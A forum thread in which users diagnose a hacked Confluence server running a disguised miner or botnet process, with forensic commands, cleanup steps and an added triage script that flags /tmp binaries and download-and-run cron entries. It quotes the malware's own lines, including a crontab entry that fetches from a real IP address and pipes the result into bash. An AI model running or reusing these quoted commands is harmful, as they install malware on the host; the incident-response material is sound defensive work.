vmlinuz process runs on 100% CPU
Your server looks like it has been hacked.
Please take a close look at the process list,
e.g. run ps auxc
and look at the process binary sources.
You can use tools like rkhunter to scan your server, but in general you should, at the beginning, kill everything that has been launched as the confluence user, scan your server/account, upgrade your Confluence (in most cases the user determines the source of the attack), and look in your Confluence for additional accounts etc.
If you would like to see what is in that process, take a look at /proc, e.g. ls -la /proc/996. You will see the source binary there too. You can also launch strace -ff -p 996 to see what the process is doing, or cat /proc/996/exe | strings to see what strings that binary has. This is probably some kind of botnet component, miner etc.
I had the same problem; it was hacked. The virus script was in /tmp. Find the script name from the "top" command (meaningless letters; mine was named "fcbk6hj") and kill the processes (maybe 3 processes):
root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl
root 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl
root 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
Kill all of them and delete /tmp/prot, and kill the /boot/vmlinuz process; the CPU is back.
I found that the virus had downloaded the script to /tmp automatically; my method was to mv wgetak to another name.
Virus behaviour: wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
I found the following task written in crontab; just delete it: */5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
After removing this from the system and crontab, it may be a good idea (at least for now) to add the confluence user to /etc/cron.deny.
And after:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information
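The two checks the answers above walk through by hand, resolving /proc/PID/exe to spot binaries running out of /tmp and reading crontabs for download-and-run entries, as a small triage script. This is an added example, not code from the thread or from Confluence; the function names, the temp-directory list and the cron pattern are my own assumptions.

```shell
#!/bin/sh
# Added triage helper (not from the thread): flags running processes whose
# binary lives in a temp directory or has been deleted, and cron entries that
# download something and hand it to a shell, the two signs discussed above.
TMPDIRS='^/(tmp|var/tmp|dev/shm)/'

# Exit 0 when an exe target looks like the /tmp droppers above or "(deleted)".
suspicious_exe() {
    printf '%s\n' "$1" | grep -Eq "$TMPDIRS|\(deleted\)$"
}

# Exit 0 when a crontab line uses a downloader and either chains the result
# into sh/bash or writes it under a temp directory (like the */5 entry above).
suspicious_cron() {
    line=$1
    case "$line" in '#'*|'') return 1 ;; esac
    printf '%s\n' "$line" | grep -Eiq 'wget|curl|fetch' || return 1
    printf '%s\n' "$line" | grep -Eq '([|]|&&|;)[[:space:]]*(/usr/bin/|/bin/)?(ba)?sh([[:space:]]|$)|-[oO][[:space:]]*/(tmp|var/tmp|dev/shm)/'
}

# Walk /proc: report pid, user and exe target of suspicious processes.
# Run as root, otherwise other users' exe links are not readable.
scan_procs() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        if suspicious_exe "$exe"; then
            pid=${p#/proc/}
            printf 'PID %s (%s): %s\n' "$pid" "$(ps -o user= -p "$pid" 2>/dev/null)" "$exe"
        fi
    done
    return 0
}

# Check the system crontab, cron.d and every user's spool (Debian and RHEL paths).
scan_crontabs() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] || continue
        while IFS= read -r line; do
            suspicious_cron "$line" && printf '%s: %s\n' "$f" "$line"
        done < "$f"
    done
    return 0
}

if [ "${1:-}" = "--scan" ]; then
    scan_procs
    scan_crontabs
fi
```

Run it as `sh triage.sh --scan` on the affected host; every line it prints is a candidate to inspect with the strace/strings steps above before killing or removing anything.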